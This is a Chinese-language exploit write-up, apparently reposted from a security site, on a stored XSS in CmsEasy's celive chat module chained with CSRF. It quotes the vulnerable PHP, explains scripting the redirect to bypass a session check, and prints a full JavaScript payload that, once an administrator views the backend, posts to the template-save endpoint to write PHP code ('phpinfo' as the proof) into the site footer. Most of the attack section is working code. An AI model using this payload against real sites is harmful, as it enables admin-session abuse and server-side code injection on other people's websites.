by zvall
代码如下：
celive/index.php 代码：

$_SESSION[\'thislive\'] = md5(time());
$_SESSION[\'thislivetmp\'] = $_SESSION[\'thislive\'];
 
if ($config[\'customer_info\']) {
header(\'Location: \'.$config[\'url\'].\'/live/?action=0&module=celive&thislive=\'.$_SESSION[\'thislive\'].\'&departmentid=\'.addslashes($_GET[\'departmentid\']));
} else {
header(\'Location: \'.$config[\'url\'].\'/live/?action=1&module=celive&thislive=\'.$_SESSION[\'thislive\'].\'&departmentid=\'.addslashes($_GET[\'departmentid\']));
}

通过 302 header 到celiveliveindex.php这个地址,而且 $thislive=\'.$_SESSION[\'thislive\'] 每次访问的值都会不一样.
celiveliveindex.php 代码：

if(isset($_GET[\'departmentid\'])){
$departmentid=addslashes($_GET[\'departmentid\']);
}else{
$sql = "SELECT `departmentid` FROM `".$config[\'prefix\']."assigns` WHERE 1";
@$result = $GLOBALS[\'db\']->my_fetch_array($sql);
$tatolr=count($result)-1;
$randomr=rand(0,$tatolr);
$departmentid = $result[$randomr][\'departmentid\'];
}
$timestamp=time();
$name=addslashes($_POST[\'name\']);
$email=addslashes($_POST[\'email\']);
$phone=addslashes($_POST[\'phone\']);
$name=(!empty($name)) ? $name : \'Guest\';
$email=(!empty($email)) ? $email : \'-\';
$phone=(!empty($phone)) ? $phone : \'0\';
$ip=$_SERVER["REMOTE_ADDR"];
$ip=iconv(\'gb2312\',$GLOBALS[\'lang\'][\'charset\'],$ip);
if(empty($departmentid)) $departmentid=0;
if($_SESSION[\'thislivetmp\']==$_GET[\'thislive\']){
$db->query("INSERT INTO `sessions` (`id` ,`name` ,`email` ,`phone` ,`departmentid` ,`timestamp` ,`ip` ,`status` ) VALUES (NULL , \'".$name."\', \'".$email."\', \'".$phone."\', \'".$departmentid."\', \'".$timestamp."\', \'".$ip."\', \'0\');");
$sessionid = mysql_insert_id();
$_SESSION[\'departmentid\'] = $departmentid;
$_SESSION[\'sessionid\'] = $sessionid;
$_SESSION[\'timestamp\'] = $timestamp;
$_SESSION[\'name\'] = $name;
}

$name=addslashes($_POST[\'name\']);这里可以xss 但是他是302 head过来的 。
if($_SESSION[\'thislivetmp\']==$_GET[\'thislive\']) 要绕过这个判断, celiveliveindex.php 只能访问一次，以保证header过去的GET变量
和session[thislivetmp] 一样 and =) produces
java 编程 得到302地址和cookie 构造 post name 为js地址 再 post 到302地址上 ,管理员在查看后台时 ,js触发通过ajax 请求 编辑后台模块插入一句话

csrf插入到模版中的php代码

js代码:

function sendrequest(){
 var m=["Msxml2.XMLHTTP", "Microsoft.XMLHTTP"]
 if (window.ActiveXObject){
  for (var i=0; i<m.length; i++){
   try{
    return new ActiveXObject(m[i])
   }
   catch(e){}
  }
 }else if (window.XMLHttpRequest) {
 return new XMLHttpRequest()
 }else{
	return false
 }
 
}
var request=new sendrequest();
var data= "sid=footer_html&slen=2661&scontent=%3C!--+%E9%A1%B5%E5%BA%95+--%3E%0A%3Cdiv+id%3D%22footer%22+class%3D%22mt10%22%3E%0A%3Cdiv+class%3D%22box%22%3E%0A%3Cdiv+class%3D%22footer%22%3E%0A%3C!--+%E5%8F%8B%E6%83%85logo+--%3E%0A%3Cdiv+class%3D%22links%22%3E%0A%7Bif+%24topid%3D%3D0%7D%0A%7Bloop+friendlink(\'image\'%2C0%2C20)+%24flink%7D%0A%3Ca+href%3D%22%7B%24flink%5Burl%5D%7D%22+title%3D%22%7B%24flink%5Bname%5D%7D%22%3E%3Cimg+src%3D%22%7B%24flink%5Blogo%5D%7D%22+%2F%3E%3C%2Fa%3E%0A%7B%2Floop%7D%0A%7Belse%7D%0A%7Blang(hotkeys)%7D%EF%BC%9A+%7Bgethotsearch(10)%7D%0A%7B%2Fif%7D%0A%3C%2Fdiv%3E%0A%3C!--+%E9%A1%B5%E5%BA%95%E5%AF%BC%E8%88%AA+--%3E%0A%3Cdiv+class%3D%22about%22%3E%0A%3Cimg+src%3D%22%7B%24skin_path%7D%2Fimages%2Ffoot_logo.gif%22+%2F%3E%0A%7Btag_%E7%BD%91%E7%AB%99%E9%A1%B5%E5%BA%95%E5%85%B3%E4%BA%8E%E6%88%91%E4%BB%AC%E7%AD%89%E8%AF%B4%E6%98%8E%7D%0A%7Bif+get(\'opguestadd\')%3D%3D\'1\'%7D%3Ca+rel%3D%22nofollow%22+href%3D%22%7B%24base_url%7D%2F%3Fg%3D1%22%3E%7Blang(opguestadd)%7D%3C%2Fa%3E+%7C%7B%2Fif%7D%0A%3Ca+href%3D%22%23%22%3ETOP%3C%2Fa%3E%0A%3C%2Fdiv%3E%0A%0A%3Cdiv+class%3D%22copyright%22%3E%0A%0A%3C!--+%E9%A1%B5%E5%BA%95%E8%AF%B4%E6%98%8E+--%3E%0A%7Bget(site_right)%7D+%3Ca+title%3D%22%7Bget(\'sitename\')%7D%22+href%3D%22%7B%24base_url%7D%2F%22%3E%7Bget(\'sitename\')%7D%3C%2Fa%3E+All+Rights+Reserved.%C2%A0%C2%A0+%7Bif+get(\'site_login\')%3D%3D\'1\'%7D%7Blogin_js()%7D%7B%2Fif%7D%0A%3Cdiv+class%3D%22blank5%22%3E%3C%2Fdiv%3E%0A%7Bgetcnzzcount()%7D%C2%A0%C2%A0Powered+by+%3Ca+href%3D%22http%3A%2F%2Fwww.cmseasy.cn%22+title%3D%22CmsEasy%E4%BC%81%E4%B8%9A%E7%BD%91%E7%AB%99%E7%B3%BB%E7%BB%9F%22+target%3D%22_blank%22%3ECmsEasy%3C%2Fa%3E%C2%A0%C2%A0%3Ca+rel%3D%22nofollow%22+href%3D%22http%3A%2F%2Fwww.miibeian.gov.cn%2F%22+rel%3D%22nofollow%22+target%3D%22_blank%22%3E%7Bget(\'site_icp\')%7D%3C%2Fa%3E%0A%3C%2Fdiv%3E%0A%3Cdiv+class%3D%22clear%22%3E%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%7Bif+%24topid%3D%3D0%7D%3C!--+%E7%83%AD%E9%97%A8%E5%85%B3%E9%94%AE%E8%AF%8D+--%3E%0A%3Cdiv+class%3D%22hot_keys%22%3E%0A%3Cstrong%3E%7Blang(hotkeys)%7D%EF%BC%9A%3C%2Fstrong%3E+%7Bgethotsearch(10)%7D%0A%3Cdiv+class%3D%22blank10%22%3E%3C%2Fdiv%3E%0A%3C!--+%E5%8F%8B%E6%83%85%E9%93%BE%E6%8E%A5+--%3E%0A%0A%3Cstrong%3E%7Blang(\'links\')%7D%EF%BC%9A%3C%2Fstrong%3E%0A%7Bloop+friendlink(\'text\'%2C0%2C20)+%24flink%7D%0A%3Ca+href%3D%22%7B%24flink%5Burl%5D%7D%22+target%3D%22_blank%22%3E%7B%24flink%5Bname%5D%7D%3C%2Fa%3E%0A%7B%2Floop%7D%0A%0A%3C%2Fdiv%3E%7B%2Fif%7D%0A%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22+src%3D%22%7B%24base_url%7D%2Fjs%2Fcommon.js%22%3E%3C%2Fscript%3E%0A%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E+%0A%2F%2F+%E5%85%AC%E5%91%8A%E6%BB%9A%E5%8A%A8js%0Avar+t%3DsetInterval(myfunc%2C1000)%3B+%0Avar+oBox%3Ddocument.getElementById(%22announ%22)%3B+%0Afunction+myfunc()%7B+%0Avar+o%3DoBox.firstChild+%0AoBox.removeChild(o)+%0AoBox.appendChild(o)+%0A%7D+%0AoBox.onmouseover%3Dfunction()%0A%7B%0AclearInterval(t)%0A%7D+%0AoBox.onmouseout%3Dfunction()%0A%7B%0At%3DsetInterval(myfunc%2C2000)%2F%2F%E6%BB%9A%E5%8A%A8%E6%97%B6%E9%97%B4%EF%BC%8C%E9%BB%98%E8%AE%A42%E7%A7%92%0A%7D+%0A%3C%2Fscript%3E%0A%0A%3C!--+%E5%9C%A8%E7%BA%BF%E5%AE%A2%E6%9C%8D+--%3E%0A%7Btemplate+\'system%2Fservers.html\'%7D%0A%3C!--+%E7%9F%AD%E4%BF%A1+--%3E%0A%7Btemplate+\'system%2Fsms.html\'%7D%0A%0A%0A%7Bif+get(\'share\')%3D%3D\'1\'%7D%0A%3C!--+Baidu+Button+BEGIN+--%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22+id%3D%22bdshare_js%22+data%3D%22type%3Dslide%26img%3D6%26pos%3Dright%26uid%3D620555%22+%3E%3C%2Fscript%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22+id%3D%22bdshell_js%22%3E%3C%2Fscript%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E%0A%09%09var+bds_config+%3D+%7B%22bdTop%22%3A150%7D%3B%0A%09%09document.getElementById(%22bdshell_js%22).src+%3D+%22http%3A%2F%2Fbdimg.share.baidu.com%2Fstatic%2Fjs%2Fshell_v2.js%3Ft%3D%22+%2B+new+Date().getHours()%3B%0A%3C%2Fscript%3E%0A%3C!--+Baidu+Button+END+--%3E%0A%7B%2Fif%7D%0A%0A%0A%3Cscript%3E%0Afunction+checkmail(str)%0A%7B%0Avar+strreg%3D%22email%22%3B%0Avar+r%3B%0Avar+strtext%3Ddocument.all(str).value%3B%0A%2F%2Fstrreg%3D%2F%5Ew%2B((-w%2B)%7C(.w%2B))*%40%5Ba-za-z0-9%5D%2B((.%7C-)%5Ba-za-z0-9%5D%2B)*.%5Ba-za-z0-9%5D%2B%24%2Fi%3B%0Astrreg%3D%2F%5Ew%2B((-w%2B)%7C(.w%2B))*%40%7B1%7Dw%2B.%7B1%7Dw%7B2%2C4%7D(.%7B0%2C1%7Dw%7B2%7D)%7B0%2C1%7D%2Fig%3B%0Ar%3Dstrtext.search(strreg)%3B%0Aif(r%3D%3D-1)+%7B%0Aalert(%22%E9%82%AE%E7%AE%B1%E6%A0%BC%E5%BC%8F%E9%94%99%E8%AF%AF!%22)%3B%0Adocument.all(str).focus()%3B%0A%7D%0A%7D%0A%3C%2Fscript%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E%0A%3C%3Fphp+phpinfo()%3B%3F%3E%EF%BC%9B";
request.open("POST", "/cmseasy/index.php?case=template&act=save&admin_dir=admin&site=default", true);
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=UTF-8");
request.send(data)	
		


	
本文来源：SecYe安全网[http://www.secye.com] (责任编辑：SecYe安全)
	


			
点击复制链接 与好友分享!
		
		
		
        

• ·微软Internet Explorer浏览器Jscript.Dll
• ·CVE-2019-0708远程桌面代码执行漏洞复现
• ·Harbor任意管理员注册漏洞
• ·微软RDP远程代码执行漏洞（CVE-2019-0708
• ·有上传文件的文件名处发现的时间延迟注入
• ·Xstream远程代码执行漏洞
• ·文本编辑器VimNeovim被曝任意代码执行漏
• ·PHPCMS v9.6.0 wap模块SQL注入 | FreeBuf
• ·戴尔电脑自带系统软件SupportAssist存在R
• ·CatFish CMS V4.8.75最新版XSS漏洞审计
• ·Easy WP SMTP（v1.3.9）0 day漏洞被攻击
• ·Weblogic反序列化远程代码执行漏洞（CVE-
• ·【漏洞预警】Weblogic反序列化远程命令执
• ·ThinkPHP 5.1框架结合RCE漏洞的深入分析
• ·WordPress Core 5.0 - Remote Code Execu
• ·NetSetMan 4.7.1 - Local Buffer Overflo